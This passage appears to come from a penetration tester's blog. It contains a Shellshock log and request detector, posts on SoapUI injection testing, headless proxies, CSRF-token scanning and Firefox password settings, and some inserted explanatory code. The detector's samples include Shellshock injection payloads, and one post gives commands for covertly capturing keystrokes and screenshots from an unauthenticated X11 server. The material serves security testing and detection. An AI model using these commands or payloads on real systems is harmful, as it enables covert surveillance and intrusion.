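    """Return [(client_ip, field, value)] for log entries carrying the pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "ua"):
            if is_shellshock_payload(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
    return hits


# Constructed samples: the POC request, a benign request, and a GET-parameter
# variant with the payload percent-encoded.
POC_REQUEST = (
    "GET /cgi-bin/echo.sh HTTP/1.1\n"
    "Host: localhost\n"
    "User-Agent: () { :;}; echo Hacked > /tmp/HackedViaUserAgent\n"
    "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n"
    "Cookie: () { :;}; echo Hacked > /tmp/HackedViaCookie\n"
    "Connection: keep-alive\n\n")
BENIGN_REQUEST = (
    "GET /cgi-bin/echo.sh HTTP/1.1\n"
    "Host: localhost\n"
    "User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0\n\n")
ENCODED_GET_REQUEST = (
    "GET /cgi-bin/echo.sh?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20test HTTP/1.1\n"
    "Host: localhost\n\n")
ACCESS_LOG = [
    '192.168.2.109 - - [25/Sep/2014:23:42:53 +0000] "GET /cgi-bin/echo.sh HTTP/1.1" 200 1866 "-" '
    '"() { :;}; echo Hacked > /tmp/HackedViaUserAgent"',
    '10.0.0.5 - - [25/Sep/2014:23:45:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0"',
]

if __name__ == "__main__":
    for loc, val in scan_request(POC_REQUEST):
        print("request:", loc, "->", val)
    for ip, field, val in scan_access_log(ACCESS_LOG):
        print("log:", ip, field, "->", val)
```

The same `is_shellshock_payload` check can be applied to any other environment-crossing input the server exposes to Bash (the CVE text lists sshd ForceCommand and DHCP clients); only the parsing around it changes. Matching `() {` alone produces no false positives on normal browser headers but does not distinguish the later variants, so treat a hit as a trigger for the patch verification above rather than as proof of compromise.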

      1 May 2014

      Getting started in web services testing with SoapUI and Mutillidae


      I wrote this post to help anyone who wants to start using SoapUI to check the security of (SOAP) web services. To do so, we first set up Mutillidae, which includes a few services to test. Then we run a SQL injection test.

      Excuse the English; I don't really have the time to translate it. But a picture is worth a thousand words, isn't it?
      ______________


      This post is meant to help a security tester set up SoapUI and use it against the test web services included in Mutillidae.

      Setting up a local test environment with web services

      Setting up SoapUI

      • Set up SoapUI, create a test project for Mutillidae, load the various Mutillidae WSDL files and set up the associated test suites for each WSDL:
      • As a simple test, double-click getUserInformation and add username and password values as follows:


      • Click on the green Submit Request button and wait for the response in the right pane:

      Creating a security test

      • Create a new Security Test:

      • Optionally, add another specific assertion, as demonstrated below.

      Note that adding an XPath assertion when testing for many injection issues may not be a good idea. At the very least, you have to make sure the assertion covers all the expected cases. For example, below, we add an XPath expression that accepts both a normal request (node count = 1) and an empty result set (node count = 0).
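To make the node-count point concrete, here is an added example (not part of the original post, and not SoapUI code) that evaluates the two possible assertions against three constructed SOAP responses: a normal lookup returning one record, an empty result set, and a response that returns several records at once. The element names (`getUserInformationResponse`, `account`) are assumptions for illustration, not Mutillidae's real schema.

```python
"""Checking an XPath-style node-count assertion against SOAP responses.

Added example, not part of the original post or of SoapUI. The response
documents are constructed; the element names are assumptions, not
Mutillidae's actual getUserInformation schema.
"""
import xml.etree.ElementTree as ET

_ENVELOPE = """<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><getUserInformationResponse><accounts>%s</accounts></getUserInformationResponse></soap:Body>
</soap:Envelope>"""

# Constructed responses: one record, no record, and several records.
NORMAL_RESPONSE = _ENVELOPE % "<account><username>alice</username></account>"
EMPTY_RESPONSE = _ENVELOPE % ""
MULTI_ROW_RESPONSE = _ENVELOPE % ("<account><username>alice</username></account>"
                                  "<account><username>bob</username></account>")


def account_count(soap_xml: str) -> int:
    """Equivalent of count(//account): number of account records in the body."""
    return len(ET.fromstring(soap_xml).findall(".//account"))


def naive_assertion(soap_xml: str) -> bool:
    """The assertion 'count(//account) = 1': holds only for exactly one record."""
    return account_count(soap_xml) == 1


def covering_assertion(soap_xml: str) -> bool:
    """'count(//account) = 1 or count(//account) = 0': one record or none is normal."""
    return account_count(soap_xml) in (0, 1)


def failing_responses(assertion, responses: dict) -> list:
    """Names of the responses for which the assertion fails (what SoapUI would report as alerts)."""
    return [name for name, xml in responses.items() if not assertion(xml)]


RESPONSES = {"normal": NORMAL_RESPONSE, "empty": EMPTY_RESPONSE, "multi": MULTI_ROW_RESPONSE}

if __name__ == "__main__":
    print("naive assertion fails on:", failing_responses(naive_assertion, RESPONSES))
    print("covering assertion fails on:", failing_responses(covering_assertion, RESPONSES))
```

The naive assertion reports the empty result set as a failure even though an unknown username legitimately returns nothing, so a security test built on it is noisy. The covering assertion accepts both normal outcomes and still fails on the multi-record response, which is the outcome that indicates the input changed the query rather than just its parameters.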

      Running the test

      Inspecting the results

      16 Dec 2013

      Acquiring memory with Dumpit

      http://isc.sans.edu/diary/Acquiring+Memory+Images+with+Dumpit/17216

      13 Nov 2013

      Headless intercepting proxy

      Here are the usable options I know of to intercept HTTP traffic in headless mode, when all you have is an isolated Kali Linux (accessed via SSH, with no X/VNC access and no Internet access to download anything):
      For example, mitmdump can run in scrolling (console) mode during the capture while saving the HTTP flows to a file. Afterwards, the flow details can be reviewed in mitmproxy's full-screen mode:
      # mitmdump -w /var/log/mitmdump-$$.log -v -p 8080
      192.168.2.109 GET http://www.jourzero.com/
          Host: www.jourzero.com
          User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
          Accept-Language: en-US,en;q=0.5
          Accept-Encoding: gzip, deflate
          DNT: 1
          Connection: keep-alive
          If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
          If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"

       << 304 Not Modified 0B

          Expires: Wed, 13 Nov 2013 17:30:43 GMT
          Date: Wed, 13 Nov 2013 17:30:43 GMT
          Cache-Control: private, max-age=0
          ETag: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
          Server: GSE

      # mitmproxy -r /var/log/mitmdump-3099.log
      >> GET http://www.jourzero.com/
      ← 304 [empty content]
      ENTER

      2013-11-13 12:30:43 GET http://www.jourzero.com/
      ← 304 [empty content]
      Request                                   Response
      Host: www.jourzero.com
      User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:25.0) Gecko/20100101 Firefox/25.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      DNT: 1
      Connection: keep-alive
      If-Modified-Since: Wed, 13 Nov 2013 17:27:42 GMT
      If-None-Match: "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      2013-11-13 12:30:43 GET http://www.jourzero.com/
                              ← 304 [empty content]
      TAB
      Request                                  Response
      Expires:        Wed, 13 Nov 2013 17:30:43 GMT
      Date:           Wed, 13 Nov 2013 17:30:43 GMT
      Cache-Control:  private, max-age=0 
      ETag:           "6f73caf0-aa84-4d81-a1e9-598d2369ecbc"
      Server:         GSE
                  
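When the only access is an SSH session, the verbose scrolling output above is hard to search afterwards. As an added example (not code from the original post), here is a small mitmdump addon that writes one line per completed exchange to a plain-text summary file, tagging requests that carry cookies, Authorization headers or conditional-request headers, and keeping a status-code histogram. It assumes the current mitmproxy addon API (a class with a `response()` hook listed in a module-level `addons` list, loaded with `-s`); the script API of the 2013-era mitmproxy used in the post differed. The flow object at the end is a constructed stand-in rebuilt from the 304 exchange above, so the module can be exercised offline.

```python
"""Headless per-flow summary addon for mitmdump.

Added example, not code from the original post. Assumes the current
mitmproxy addon API; the 2013-era script API differed. Usage over SSH,
alongside the flow file:

    mitmdump -p 8080 -w /var/log/mitmdump-$$.log -s flow_summary.py
"""
import time


class FlowSummary:
    """Append one line per completed HTTP exchange to a plain-text file."""

    def __init__(self, path="/tmp/flow-summary.txt"):
        self.path = path
        self.status_counts = {}

    @staticmethod
    def summarize(flow) -> str:
        """One line: METHOD URL STATUS SIZE [tags for security-relevant headers]."""
        req, resp = flow.request, flow.response
        # Lower-case the names so the same code works on mitmproxy's Headers
        # object and on the plain dict used by the offline stand-in below.
        req_hdrs = {k.lower(): v for k, v in req.headers.items()}
        resp_hdrs = {k.lower(): v for k, v in resp.headers.items()}
        tags = []
        if "cookie" in req_hdrs:
            tags.append("cookie")
        if "authorization" in req_hdrs:
            tags.append("auth")
        if "set-cookie" in resp_hdrs:
            tags.append("set-cookie")
        if "if-none-match" in req_hdrs or "etag" in resp_hdrs:
            tags.append("etag")          # conditional request, like the 304 above
        size = len(resp.content or b"")
        line = "%s %s %d %dB" % (req.method, req.pretty_url, resp.status_code, size)
        return line + (" [" + ",".join(tags) + "]" if tags else "")

    def record(self, flow) -> str:
        """Update the status histogram and return the summary line."""
        code = flow.response.status_code
        self.status_counts[code] = self.status_counts.get(code, 0) + 1
        return self.summarize(flow)

    def response(self, flow):
        """mitmproxy hook: runs once the server's response has arrived."""
        with open(self.path, "a") as fh:
            fh.write(time.strftime("%Y-%m-%d %H:%M:%S ") + self.record(flow) + "\n")


addons = [FlowSummary()]


class _Obj:
    """Minimal stand-in for mitmproxy's flow/request/response objects (offline use)."""

    def __init__(self, **kw):
        self.__dict__.update(kw)


def constructed_flow():
    """The 304 exchange from the mitmdump session, rebuilt as a constructed object."""
    req = _Obj(method="GET", pretty_url="http://www.jourzero.com/",
               headers={"Host": "www.jourzero.com", "DNT": "1",
                        "If-None-Match": '"6f73caf0-aa84-4d81-a1e9-598d2369ecbc"'})
    resp = _Obj(status_code=304, content=b"",
                headers={"ETag": '"6f73caf0-aa84-4d81-a1e9-598d2369ecbc"', "Server": "GSE"})
    return _Obj(request=req, response=resp)


if __name__ == "__main__":
    print(FlowSummary.summarize(constructed_flow()))
```

The full flows are still saved with `-w` for later replay in `mitmproxy -r`; the summary file is only an index that can be grepped over SSH to find which flows are worth opening.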


      These other options also offer a "headless" mode but are not as simple to use:
      • Zed Attack Proxy with the "-daemon" option: zap.sh -daemon. My experience says you have to know how to edit the proxy's XML configuration files to get what you want. Not the most attractive option.
      • Burp with the -Djava.awt.headless=true option. Scripts that use this option: sodapop.sh and bscan
      • Proxystrike with the -c (console) option - not sure this option is really usable...
      • Metasploit socks4a auxiliary server:
      msf > use auxiliary/server/socks4a
      msf auxiliary(socks4a) > info

      Name: Socks4a Proxy Server
      Module: auxiliary/server/socks4a
      Version: 0
      License: Metasploit Framework License (BSD)
      Rank: Normal

      Provided by:
      sf

      Basic options:
      Name Current Setting Required Description
      ---- --------------- -------- -----------
      SRVHOST 0.0.0.0 yes The address to listen on
      SRVPORT 1080 yes The port to listen on.

      Description:
      This module provides a socks4a proxy server that uses the builtin
      Metasploit routing to relay connections.

      msf auxiliary(socks4a) > run
      [*] Auxiliary module execution completed

      [*] Starting the socks4a proxy server
      msf auxiliary(socks4a) > jobs

      Jobs
      ====

      Id Name
      -- ----
      0 Auxiliary: server/socks4a
       

      12 Nov 2013

      Scanning sites protected against CSRF attacks

      To allow the scanning of sites protected against Cross-Site Request Forgery (CSRF) attacks, a Burp plugin was developed (proof of concept). It can be found here: http://code.google.com/p/pysqlin/downloads/list.

      Taken from an article on http://edge-security.blogspot.ca:
      In order to perform an automatic scan of CSRF-protected sites, requests must be performed sequentially as each request contains a newly generated anti-CSRF token needed for the next request, forming a token chain.

      A POC in the form of a Burp suite plugin has been developed to verify this approach, it can be downloaded at http://code.google.com/p/pysqlin/downloads/list. It should be noted however that this code is a POC and it requires further development in order to be able to work against real environments (any link of a webapp with this behavior is appreciated).

      Original post origin: http://edge-security.blogspot.ca.
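The token chain described above is easiest to understand with both sides in front of you. The following is an added example, not the Burp plugin from the post: a toy server that issues a fresh anti-CSRF token with every response and accepts only the token from the immediately preceding response, plus a client that chains the tokens. Running the same requests with one reused token shows why a scanner that fires requests independently gets nothing but 403s after the first one. Everything here is simulated in-process with constructed data; the form field name `csrf_token` is an assumption.

```python
"""Token chain: why a scanner of CSRF-protected sites must send requests sequentially.

Added example, not the Burp plugin from the post. Both sides are simulated
in-process; the hidden-field name csrf_token is an assumption.
"""
import hmac
import secrets
from html.parser import HTMLParser


class TokenChainServer:
    """Toy server: each response embeds a new token, each POST must carry the last one."""

    def __init__(self):
        self.current_token = secrets.token_hex(8)   # token handed out in the last response
        self.accepted = []                           # values from accepted POSTs

    def get_form(self) -> str:
        """GET /form: HTML page with the current token in a hidden field."""
        return ('<form method="post" action="/update">'
                '<input type="hidden" name="csrf_token" value="%s">'
                '<input name="q"></form>' % self.current_token)

    def post(self, params: dict) -> tuple:
        """POST /update: returns (status, next page). The token rotates on every response."""
        ok = hmac.compare_digest(params.get("csrf_token", ""), self.current_token)
        self.current_token = secrets.token_hex(8)    # the next request needs this one
        if ok:
            self.accepted.append(params.get("q"))
        return (200 if ok else 403), self.get_form()


class _TokenExtractor(HTMLParser):
    """Pull the csrf_token hidden field out of a page."""

    def __init__(self):
        super().__init__()
        self.token = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("name") == "csrf_token":
            self.token = a.get("value")


def extract_token(html: str):
    """Client side of the chain: read the token the server just issued."""
    p = _TokenExtractor()
    p.feed(html)
    return p.token


def sequential_scan(server, values) -> list:
    """Chained scanning: each request carries the token from the previous response."""
    statuses = []
    page = server.get_form()
    for v in values:
        status, page = server.post({"csrf_token": extract_token(page), "q": v})
        statuses.append(status)
    return statuses


def replay_one_token(server, values) -> list:
    """Non-chained: reuse the token from one initial page, as an independent scanner would."""
    token = extract_token(server.get_form())
    return [server.post({"csrf_token": token, "q": v})[0] for v in values]


if __name__ == "__main__":
    print("chained:", sequential_scan(TokenChainServer(), ["a", "b", "c"]))
    print("replayed:", replay_one_token(TokenChainServer(), ["a", "b", "c"]))
```

On the defensive side, rotating the token on every response is what makes the chain; a site that rotates only per session does not force sequential requests, so the fact that automated scanning needs this plugin is itself a sign that the target's CSRF protection is the stricter per-request kind.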

      25 Jul 2013

      Keeping HTML line breaks in Excel (without an extra row)

      Here is a frequent problem: you want to import an HTML table into Excel without Excel interpreting the <BR> line-break tags as a new row, which makes sorting and filtering impossible. In my opinion, the lack of any flexibility in this regard from the Excel user interface is a bug!

      The simplest solution is to add a Microsoft-specific style (in the HTML file) as follows:

      <html>... <style> br { mso-data-placement:same-cell; } </style> ...</html>

      Thanks to Michu (24/7 dev & coffee blog) for the tip!

      Ref: Generating Excel files from web - line breaks in cells 

      Thanks to Michu for the great tip... Initial text copied here for convenience...

      Generating Excel files from web - line breaks in cells

      ...I needed to wrap text in a cell, but when I put the tag into the HTML output, Excel interpreted it as a new row, not a line break in the existing cell. The solution I found is to add this to a stylesheet:
          br {mso-data-placement:same-cell;}

      11 Jan 2013

      Attacking an X11 server without authentication (after xhost +)

      Here are a few commands to exploit an open X11 server:

      Remote key capture:
      $ xkey IP:0.0

      NB:
      • The source code for xkey.c can be found here
      • Use 0.0 for port 6000, 1.0 for port 6001, and so on
       
      Screen capture:
      $ xwd -display IP:0.0 -root -silent -out /tmp/screendump
      $ xv /tmp/screendump 
      $ xwd -display IP:0.0 -root -silent | xwdtopnm | pnmtopng > Screenshot.png


      References:

      2 Dec 2012

      Analysis of Android app traffic through Burp Suite

      Good summary here

      Related articles

      23 Nov 2012

      Forcing Firefox to remember passwords

      The Firefox configuration setting wallet.crypto.autocompleteoverride allows overriding autocomplete="off" so that passwords are always remembered. This may be useful where Greasemonkey isn't available (i.e. on Android). I'll need to test this...

      Of course, this needs to be used with caution (on a test system, if Firefox isn't the default browser...).

      As said, on a desktop, a better option is to use a Greasemonkey script or modify the nsLoginManager.js file.

      Ref: Wallet.crypto.autocompleteoverride - MozillaZine Knowledge Base